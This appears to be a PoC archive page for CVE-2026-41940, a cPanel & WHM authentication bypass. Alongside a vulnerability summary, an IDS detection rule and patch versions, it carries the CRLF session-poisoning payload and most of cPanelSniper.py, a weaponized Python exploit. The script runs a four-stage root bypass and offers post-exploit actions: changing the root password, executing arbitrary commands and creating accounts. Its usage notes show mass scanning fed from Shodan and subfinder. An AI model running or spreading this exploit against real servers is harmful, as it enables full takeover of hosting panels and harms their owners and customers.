PoC Archive PoC Archive
Critical CVE-2026-41940 patched

cPanel & WHM Authentication Bypass via Session-File CRLF Injection (CVE-2026-41940)

by ynsmroztas (Mitsec) · 2026-05-16

CVSS 10.0/10
Severity
Critical
CVE
CVE-2026-41940
Category
web
Affected product
cPanel & WHM
Affected versions
110.x ≤ 11.110.0.96, 118.x ≤ 11.118.0.62, 126.x ≤ 11.126.0.53, 132.x ≤ 11.132.0.28, 134.x ≤ 11.134.0.19, 136.x ≤ 11.136.0.4
Disclosed
2026-05-16
Patch status
patched

Metadata

FieldValue
Date Added2026-05-16
Author / Researcherynsmroztas (Mitsec)
CVE / AdvisoryCVE-2026-41940
Categoryweb
SeverityCritical
CVSS Score10.0 (CVSSv3)
StatusWeaponized
Tagsauth-bypass, CRLF-injection, session-poisoning, cPanel, WHM, unauthenticated
RelatedN/A

Affected Target

FieldValue
Software / SystemcPanel & WHM
Versions Affected110.x ≤ 11.110.0.96, 118.x ≤ 11.118.0.62, 126.x ≤ 11.126.0.53, 132.x ≤ 11.132.0.28, 134.x ≤ 11.134.0.19, 136.x ≤ 11.136.0.4
Language / PlatformPerl backend (Session.pm) / Linux hosting panels
Authentication RequiredNo
Network Access RequiredYes

Summary

CVE-2026-41940 is a critical unauthenticated authentication bypass in cPanel & WHM. The vulnerable session handling flow writes attacker-controlled Authorization: Basic data to the session file before sanitization, allowing CRLF injection of trusted session fields. By poisoning values such as hasroot=1, user=root, and tfa_verified=1, a remote attacker can obtain root-level WHM access without valid credentials.


Vulnerability Details

Root Cause

In the vulnerable flow, saveSession() writes raw session data to disk and only then calls filter_sessiondata(). Because CRLF characters from a crafted Basic authorization value are preserved during write, additional key/value lines are injected into the on-disk session file and later parsed as legitimate session state.

Attack Vector

An unauthenticated attacker sends a crafted authentication sequence against exposed WHM/cPanel endpoints. The exploit chain mints a preauth session, performs CRLF injection via the Authorization header, triggers propagation (do_token_denied gadget), and finally verifies privileged API access through /json-api/version.

Impact

Successful exploitation yields full WHM root-session context on vulnerable targets. This enables privileged administrative actions such as account enumeration, command execution via WHM API, and credential modifications, resulting in complete panel compromise.


Environment / Lab Setup

OS:          Linux (attacker host with Python 3.8+)
Target:      Internet-exposed cPanel & WHM (vulnerable versions)
Attacker:    Authorized security testing host
Tools:       Python stdlib, cPanelSniper.py

Setup Steps

1
2
3
git clone https://github.com/ynsmroztas/cPanelSniper
cd cPanelSniper
python3 cPanelSniper.py --help

Proof of Concept

Step-by-Step Reproduction

  1. Discover canonical target hostname using the OpenID redirect endpoint.
  2. Mint preauth session by posting invalid credentials to /login/?login_only=1 and capturing the returned whostmgrsession cookie.
  3. Inject CRLF payload through a crafted Authorization: Basic header while reusing the minted session.
  4. Trigger session propagation with /scripts2/listaccts so injected raw session fields are consumed by cache logic.
  5. Verify bypass by requesting /cpsess*/json-api/version and observing successful privileged API response.

Exploit Code

See cPanelSniper.py in this folder.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
import base64

payload = (
    "root:x\r\n"
    "successful_internal_auth_with_timestamp=9999999999\r\n"
    "user=root\r\n"
    "tfa_verified=1\r\n"
    "hasroot=1"
)

header_value = "Basic " + base64.b64encode(payload.encode()).decode()
print(header_value)

Expected Output

[PWND] CVE-2026-41940 CONFIRMED — WHM root access!
[PWND]   Token    : /cpsessXXXXXXXXXX
[PWND]   API URL  : https://target:2087/cpsessXXXXXXXXXX/json-api/version

Screenshots / Evidence

  • screenshots/ — add authorized lab captures of bypass and privileged API response

Detection & Indicators of Compromise

SIEM / IDS Rule (example):

alert http any any -> $HTTP_SERVERS 2087 (
  msg:"Possible cPanel CVE-2026-41940 CRLF session injection";
  content:"Authorization|3a| Basic "; http_header;
  content:"/scripts2/listaccts"; http_uri;
  sid:9401940; rev:1;
)

Remediation

ActionDetail
PatchUpgrade to fixed releases: 11.110.0.97, 11.118.0.63, 11.126.0.54, 11.132.0.29, 11.134.0.20, or 11.136.0.5+
WorkaroundRestrict WHM/cPanel management interfaces to trusted IP ranges and enforce access through VPN/jump hosts
Config HardeningMonitor and block malformed Basic auth headers containing CR/LF patterns; alert on anomalous whostmgrsession usage

References


Notes

Auto-ingested from https://github.com/ynsmroztas/cPanelSniper on 2026-05-16.

cPanelSniper.py
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
#!/usr/bin/env python3
# DISCLAIMER: For authorized security research only.
# -*- coding: utf-8 -*-
"""
cPanelSniper.py — CVE-2026-41940 cPanel & WHM Auth Bypass Scanner
Author  : Mitsec (@ynsmroztas)
Version : 2.0

CVE-2026-41940: Session-File CRLF Injection → WHM Root Authentication Bypass
  saveSession() calls filter_sessiondata() AFTER writing the session file.
  CRLF chars in the Authorization Basic header poison the on-disk session with
  attacker-controlled fields (hasroot=1, tfa_verified=1, etc.)

Exploit Chain (4 stages):
  [0] Auto-discover canonical hostname via /openid_connect/cpanelid 307
  [1] POST /login/?login_only=1  wrong creds → preauth session cookie
  [2] GET /  + CRLF-poisoned Authorization: Basic → session file poisoned
  [3] GET /scripts2/listaccts   → triggers do_token_denied gadget (raw→cache flush)
  [4] GET /{{token}}/json-api/version  → 200 + version = ROOT ACCESS CONFIRMED

Post-Exploit:
  --action passwd   → Change root password via WHM API
  --action cmd      → Execute arbitrary commands via /json-api/scripts/exec
  --action adduser  → Create new WHM account
  --action list     → List all cPanel accounts

Affected  : cPanel & WHM < 11.110.0.97 / 11.118.0.63 / 11.126.0.54 /
                           11.132.0.29 / 11.134.0.20 / 11.136.0.5
Fixed     : filter_sessiondata() moved before session write in Session.pm
CVSS      : 10.0 Critical | In-the-wild exploitation confirmed (Apr 2026)

Usage:
  python3 cPanelSniper.py -u https://target.com:2087
  python3 cPanelSniper.py -u https://target.com:2087 --action list
  python3 cPanelSniper.py -u https://target.com:2087 --action passwd --passwd Mitsec@2026!
  python3 cPanelSniper.py -l targets.txt -t 20 -o results.json
  cat urls.txt | python3 cPanelSniper.py
  subfinder -d target.com | httpx -p 2087 -silent | python3 cPanelSniper.py
  shodan search --fields ip_str,port 'title:"WHM Login"' | \\
    awk '{print "https://"$1":"$2}' | python3 cPanelSniper.py -t 30

stdlib only — no pip required.
"""

import sys, os, re, json, ssl, signal, argparse, threading, time
from concurrent.futures import ThreadPoolExecutor, as_completed
from datetime import datetime
from urllib.parse import (urlsplit, quote, unquote, urlencode,
                           urlparse, parse_qs)
from collections import defaultdict
import urllib.request, urllib.error

# ══════════════════════════════════════════════════════════════
#  COLORS
# ══════════════════════════════════════════════════════════════
class C:
    RED    = "\033[91m"; GREEN  = "\033[92m"; YELLOW = "\033[93m"
    BLUE   = "\033[94m"; PURPLE = "\033[95m"; CYAN   = "\033[96m"
    BOLD   = "\033[1m";  DIM    = "\033[2m";  RESET  = "\033[0m"
    ORANGE = "\033[38;5;208m"

LOG_LOCK   = threading.Lock()
PRINT_LOCK = threading.Lock()

def ts():
    return datetime.now().strftime("%H:%M:%S")

def log(level, msg, target=""):
    icons = {
        "CRIT":  f"{C.RED}{C.BOLD}[CRIT]{C.RESET}",
        "HIGH":  f"{C.RED}[HIGH]{C.RESET}",
        "INFO":  f"{C.BLUE}[INFO]{C.RESET}",
        "OK":    f"{C.GREEN}[  OK]{C.RESET}",
        "ERR":   f"{C.DIM}[ ERR]{C.RESET}",
        "SKIP":  f"{C.DIM}[SKIP]{C.RESET}",
        "SCAN":  f"{C.PURPLE}[SCAN]{C.RESET}",
        "STEP":  f"{C.CYAN}[{level:>4}]{C.RESET}",
        "PWNED": f"{C.RED}{C.BOLD}[PWND]{C.RESET}",
        "WARN":  f"{C.YELLOW}[WARN]{C.RESET}",
        "API":   f"{C.ORANGE}[ API]{C.RESET}",
    }.get(level, f"[{level:>4}]")
    t = f" {C.DIM}{target}{C.RESET}" if target else ""
    with LOG_LOCK:
        print(f"{C.DIM}{ts()}{C.RESET} {icons} {msg}{t}", file=sys.stderr, flush=True)

def safe_print(msg):
    with PRINT_LOCK:
        print(msg, flush=True)

def banner():
    print(f"""{C.ORANGE}{C.BOLD}
   ██████╗██████╗  █████╗ ███╗  ██╗███████╗██╗
  ██╔════╝██╔══██╗██╔══██╗████╗ ██║██╔════╝██║
  ██║     ██████╔╝███████║██╔██╗██║█████╗  ██║
  ██║     ██╔═══╝ ██╔══██║██║╚████║██╔══╝  ██║
  ╚██████╗██║     ██║  ██║██║ ╚███║███████╗███████╗
   ╚═════╝╚═╝     ╚═╝  ╚═╝╚═╝  ╚══╝╚══════╝╚══════╝{C.RESET}
{C.BOLD}███████╗███╗  ██╗██╗██████╗ ███████╗██████╗{C.RESET}
{C.BOLD}██╔════╝████╗ ██║██║██╔══██╗██╔════╝██╔══██╗{C.RESET}
{C.BOLD}███████╗██╔██╗██║██║██████╔╝█████╗  ██████╔╝{C.RESET}
{C.BOLD}╚════██║██║╚████║██║██╔═══╝ ██╔══╝  ██╔══██╗{C.RESET}
{C.BOLD}███████║██║ ╚███║██║██║     ███████╗██║  ██║{C.RESET}
{C.BOLD}╚══════╝╚═╝  ╚══╝╚═╝╚═╝     ╚══════╝╚═╝  ╚═╝{C.RESET}
{C.CYAN}  CVE-2026-41940 — cPanel & WHM Auth Bypass via CRLF Injection{C.RESET}
{C.DIM}  4-stage: preauth → CRLF inject → propagate → verify → post-exploit{C.RESET}
{C.RED}  In-The-Wild | CVSS 10.0 | By Mitsec (@ynsmroztas){C.RESET}
""")

# ══════════════════════════════════════════════════════════════
#  CRLF PAYLOAD
# ══════════════════════════════════════════════════════════════
# Decodes to:
#   root:x\r\n
#   successful_internal_auth_with_timestamp=9999999999\r\n
#   user=root\r\n
#   tfa_verified=1\r\n
#   hasroot=1
# Fields written directly into the session file, bypassing auth check
PAYLOAD_B64 = (
    "cm9vdDp4DQpzdWNjZXNzZnVsX2ludGVybmFsX2F1dGhfd2l0aF90aW1lc3RhbXA9OTk5"
    "OTk5OTk5OQ0KdXNlcj1yb290DQp0ZmFfdmVyaWZpZWQ9MQ0KaGFzcm9vdD0x"
)

# Patched versions
PATCHED = {
    "110": ("11.110.0.97",  97),
    "118": ("11.118.0.63",  63),
    "126": ("11.126.0.54",  54),
    "132": ("11.132.0.29",  29),
    "134": ("11.134.0.20",  20),
    "136": ("11.136.0.5",    5),
}

# ══════════════════════════════════════════════════════════════
#  HTTP ENGINE  — stdlib, raw Set-Cookie access preserved
# ══════════════════════════════════════════════════════════════
class _SSLCtx:
    _ctx = None
    @classmethod
    def get(cls):
        if not cls._ctx:
            c = ssl.create_default_context()
            c.check_hostname = False
            c.verify_mode    = ssl.CERT_NONE
            try: c.set_ciphers("DEFAULT:@SECLEVEL=1")
            except: pass
            cls._ctx = c
        return cls._ctx

BASE_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
           "AppleWebKit/537.36 (KHTML, like Gecko) "
           "Chrome/146.0.0.0 Safari/537.36")

class R:
    """Thin response wrapper"""
    def __init__(self, status, body, headers, url, raw_cookies=""):
        self.status      = status
        self.body        = body
        self.headers     = headers         # lowercase keys, last value wins
        self.url         = url
        self.raw_cookies = raw_cookies     # raw Set-Cookie header(s)

    def h(self, k, default=""):
        return self.headers.get(k.lower(), default)

    def location(self):
        return self.h("location")

    def raw_cookie(self, name):
        """Extract raw (URL-encoded) value of named cookie from Set-Cookie"""
        for line in self.raw_cookies.split("\n"):
            if line.lower().startswith(name.lower() + "="):
                v = line.split("=", 1)[1].split(";", 1)[0].strip()
                return v
        return ""

class _NoRedir(urllib.request.HTTPErrorProcessor):
    def http_response(self, req, r): return r
    https_response = http_response

def _do(url, method="GET", extra_headers=None, data=None, timeout=15,
        follow=False, canonical_host=None):
    parsed = urlparse(url)
    h = {
        "User-Agent": BASE_UA,
        "Accept":     "*/*",
        "Connection": "close",
    }
    # Spoof Host to canonical if provided (avoids redirect loops)
    if canonical_host:
        port = parsed.port or (443 if parsed.scheme=="https" else 80)
        h["Host"] = f"{canonical_host}:{port}" if port not in (80,443) \
                    else canonical_host
    if extra_headers:
        h.update(extra_headers)

    body_bytes = None
    if data:
        if isinstance(data, dict):
            body_bytes = urlencode(data).encode()
            h.setdefault("Content-Type", "application/x-www-form-urlencoded")
        elif isinstance(data, str):
            body_bytes = data.encode()
        else:
            body_bytes = data

    if follow:
        opener = urllib.request.build_opener(
            urllib.request.HTTPSHandler(context=_SSLCtx.get()))
    else:
        opener = urllib.request.build_opener(
            urllib.request.HTTPSHandler(context=_SSLCtx.get()), _NoRedir())
    opener.addheaders = []

    try:
        req = urllib.request.Request(url, data=body_bytes,
                                     headers=h, method=method)
        with opener.open(req, timeout=timeout) as resp:
            body_bytes_out = resp.read()
            body     = body_bytes_out.decode("utf-8", errors="replace")
            rh       = {}
            raw_ck   = []
            for k, v in resp.headers.items():
                rh[k.lower()] = v
                if k.lower() == "set-cookie":
                    raw_ck.append(v)
            return R(resp.status, body, rh, resp.url, "\n".join(raw_ck))
    except urllib.error.HTTPError as e:
        try:    body = e.read().decode("utf-8", errors="replace")
        except: body = ""
        rh     = {k.lower(): v for k,v in e.headers.items()} if hasattr(e,"headers") else {}
        raw_ck = []
        if hasattr(e, "headers"):
            for k,v in e.headers.items():
                if k.lower() == "set-cookie":
                    raw_ck.append(v)
        return R(e.code, body, rh, url, "\n".join(raw_ck))
    except Exception as ex:
        return R(0, str(ex), {}, url, "")

# ══════════════════════════════════════════════════════════════
#  TARGET PARSING
# ══════════════════════════════════════════════════════════════
def parse_target(url: str) -> tuple:
    if "://" not in url:
        url = "https://" + url
    u = urlsplit(url.rstrip("/"))
    scheme = u.scheme or "https"
    host   = u.hostname or url
    port   = u.port or 2087
    return scheme, host, port

def build_url(scheme, host, port, path):
    if (scheme == "https" and port == 443) or (scheme == "http" and port == 80):
        return f"{scheme}://{host}{path}"
    return f"{scheme}://{host}:{port}{path}"

def is_version_patched(version: str):
    m = re.match(r"11\.(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        return None
    branch, patch, build = m.group(1), int(m.group(2)), int(m.group(3))
    if branch in PATCHED:
        _, patched_build = PATCHED[branch]
        return build >= patched_build
    return None

# ══════════════════════════════════════════════════════════════
#  STAGE 0 — Canonical hostname discovery
# ══════════════════════════════════════════════════════════════
def stage0_canonical(scheme, host, port, timeout) -> str:
    """
    cpsrvd 307s to the correct hostname when our Host is wrong.
    GET /openid_connect/cpanelid → Location: https://<real-host>:port/...
    """
    url  = build_url(scheme, host, port, "/openid_connect/cpanelid")
    resp = _do(url, timeout=timeout, follow=False)
    loc  = resp.location()
    m    = re.match(r"^https?://([^:/]+)", loc)
    if m:
        canonical = m.group(1)
        log("INFO", f"Canonical hostname discovered: {canonical}")
        return canonical
    return host  # fallback

# ══════════════════════════════════════════════════════════════
#  STAGE 1 — Mint preauth session
# ══════════════════════════════════════════════════════════════
def stage1_preauth(scheme, host, port, canonical, timeout) -> str:
    """
    POST /login/?login_only=1  wrong creds → 401 + whostmgrsession cookie.
    Session name extracted from raw Set-Cookie (before %2C / comma).
    """
    url  = build_url(scheme, host, port, "/login/?login_only=1")
    resp = _do(url, method="POST",
               data={"user": "root", "pass": "wrong"},
               timeout=timeout,
               canonical_host=canonical)

    if resp.status not in (200, 401):
        log("ERR", f"Stage1: unexpected status {resp.status}")
        return None

    # Get raw Set-Cookie to preserve URL-encoding
    raw_ck = resp.raw_cookie("whostmgrsession")
    if not raw_ck:
        # Fallback: check header directly
        raw_ck = resp.h("set-cookie")
        m = re.search(r'whostmgrsession=([^;,\s]+)', raw_ck, re.IGNORECASE)
        raw_ck = m.group(1) if m else ""

    if not raw_ck:
        log("ERR", "Stage1: no whostmgrsession cookie received")
        return None

    # URL-decode to get :SessionName,ObHex format
    decoded = unquote(raw_ck)

    # Strip the ",<obhex>" tail — this makes the encoder skip pass in stage2
    if "," in decoded:
        session_base = decoded.split(",", 1)[0]
    else:
        session_base = decoded

    log("OK", f"Stage1: preauth session = {session_base[:35]}...", "")
    return session_base

# ══════════════════════════════════════════════════════════════
#  STAGE 2 — CRLF injection
# ══════════════════════════════════════════════════════════════
def stage2_inject(scheme, host, port, canonical, session_base, timeout) -> str:
    """
    GET /  with CRLF-poisoned Authorization: Basic header.
    cpsrvd reads Basic auth value, writes it into session file → CRLF fields injected.
    Response: 307 Location: /cpsessXXXXXXXXXX/...
    """
    cookie_enc = quote(session_base)
    url  = build_url(scheme, host, port, "/")
    resp = _do(url, method="GET",
               extra_headers={
                   "Authorization": f"Basic {PAYLOAD_B64}",
                   "Cookie":        f"whostmgrsession={cookie_enc}",
               },
               timeout=timeout,
               canonical_host=canonical)

    loc = resp.location()
    m   = re.search(r"/cpsess(\d{10})", loc)
    if not m:
        log("ERR", f"Stage2: no /cpsess token in redirect (HTTP {resp.status})")
        if loc:
            log("WARN", f"Stage2: Location={loc[:80]}")
        return None

    token = f"/cpsess{m.group(1)}"
    log("OK", f"Stage2: HTTP {resp.status} → token={token}")
    return token

# ══════════════════════════════════════════════════════════════
#  STAGE 3 — Propagate (do_token_denied gadget)
# ══════════════════════════════════════════════════════════════
def stage3_propagate(scheme, host, port, canonical, session_base, timeout) -> bool:
    """
    GET /scripts2/listaccts fires the do_token_denied internal gadget.
    This flushes the raw session file into the session cache — without this
    step the injected fields are not yet active.
    Expected: 401 with "Token denied" or "WHM Login" in body.
    """
    cookie_enc = quote(session_base)
    url  = build_url(scheme, host, port, "/scripts2/listaccts")
    resp = _do(url, method="GET",
               extra_headers={"Cookie": f"whostmgrsession={cookie_enc}"},
               timeout=timeout,
               canonical_host=canonical)

    body = resp.body or ""
    if resp.status == 401 and any(x in body for x in
                                   ["Token denied", "WHM Login", "login"]):
        log("OK", f"Stage3: HTTP {resp.status} — do_token_denied gadget fired")
        return True

    # Accept 200 too — some configs show the page instead
    if resp.status in (200, 301, 302, 307):
        log("OK", f"Stage3: HTTP {resp.status} — propagation likely fired")
        return True

    log("WARN", f"Stage3: unexpected HTTP {resp.status} — continuing anyway")
    return True  # don't abort — sometimes this step behaves differently

# ══════════════════════════════════════════════════════════════
#  STAGE 4 — Verify WHM root access
# ══════════════════════════════════════════════════════════════
def stage4_verify(scheme, host, port, canonical, session_base, token, timeout) -> dict:
    """
    GET /{{token}}/json-api/version → 200 + version data = auth bypass confirmed.
    Also accepts 500/503 with "License" (past auth, license-gated only).
    """
    cookie_enc = quote(session_base)
    url  = build_url(scheme, host, port, f"{token}/json-api/version")
    resp = _do(url, method="GET",
               extra_headers={"Cookie": f"whostmgrsession={cookie_enc}"},
               timeout=timeout,
               canonical_host=canonical)

    body = (resp.body or "").strip()
    log("INFO", f"Stage4: HTTP {resp.status}  {body[:100]}")

    if resp.status == 200 and '"version"' in body:
        version = ""
        m = re.search(r'"version"\s*:\s*"([^"]+)"', body)
        if m:
            version = m.group(1)
        return {"confirmed": True, "version": version, "body": body[:600]}

    # License-gated but auth passed
    if resp.status in (500, 503) and "License" in body:
        return {"confirmed": True, "version": "unknown (license-gated)",
                "body": body[:300]}

    return {"confirmed": False}

# ══════════════════════════════════════════════════════════════
#  WHM API CALLER
# ══════════════════════════════════════════════════════════════
def whm_api(scheme, host, port, canonical, session_base, token,
            function, params, timeout):
    """Call authenticated WHM JSON API"""
    cookie_enc = quote(session_base)
    qs = "api.version=1"
    for k, v in params.items():
        if v is not None:
            qs += f"&{quote(str(k))}={quote(str(v))}"
    path = f"{token}/json-api/{function}?{qs}"
    url  = build_url(scheme, host, port, path)
    resp = _do(url, method="GET",
               extra_headers={"Cookie": f"whostmgrsession={cookie_enc}"},
               timeout=timeout,
               canonical_host=canonical)
    log("API", f"{function} → HTTP {resp.status}")
    try:
        j = json.loads(resp.body)
        return resp.status, j
    except Exception:
        return resp.status, resp.body

# ══════════════════════════════════════════════════════════════
#  POST-EXPLOIT ACTIONS
# ══════════════════════════════════════════════════════════════
def action_list_accounts(ctx):
    """List all cPanel accounts"""
    log("API", "Listing all cPanel accounts...")
    s, data = whm_api(*ctx[:6], "listaccts", {"search": "", "searchtype": "user"}, ctx[6])
    if isinstance(data, dict):
        accts = data.get("data", {}).get("acct", [])
        if accts:
            log("OK", f"Found {len(accts)} cPanel accounts:")
            for a in accts:
                safe_print(f"  {C.GREEN}  user={a.get('user','?'):20s} "
                           f"domain={a.get('domain','?'):30s} "
                           f"email={a.get('email','?')}{C.RESET}")
        else:
            safe_print(str(data)[:1000])
    else:
        safe_print(str(data)[:1000])

def action_change_passwd(ctx, new_password):
    """Change root password"""
    log("API", "Changing root password")
    s, data = whm_api(*ctx[:6], "passwd",
                      {"user": "root", "password": new_password}, ctx[6], ctx[-1])
    safe_print(json.dumps(data, indent=2)[:800] if isinstance(data, dict)
               else str(data)[:800])

def action_exec_cmd(ctx, cmd):
    """Execute OS command via WHM exec API"""
    log("API", f"Executing command: {cmd}")
    s, data = whm_api(*ctx[:6], "scripts/exec",
                      {"command": cmd}, ctx[6])
    if isinstance(data, dict):
        output = data.get("data", {}).get("output",
                 data.get("metadata", {}).get("reason", str(data)))
        safe_print(f"\n{C.GREEN}{output}{C.RESET}")
    else:
        safe_print(str(data)[:800])

def action_server_info(ctx):
    """Get server info via multiple lightweight endpoints"""
    log("API", "Gathering server info (license-safe endpoints)...")
    scheme, host, port, canonical, session_base, token, timeout = ctx

    info = {}
    for ep, params, label in [
        ("gethostname",    {},           "hostname"),
        ("loadavg",        {},           "load"),
        ("getdiskinfo",    {},           "disk"),
        ("getmysqlhost",   {},           "mysql_host"),
        ("listresellers",  {},           "resellers"),
        ("version",        {},           "version"),
    ]:
        s, data = whm_api(*ctx[:6], ep, params, timeout)
Showing 500 of 1063 lines View full file on GitHub →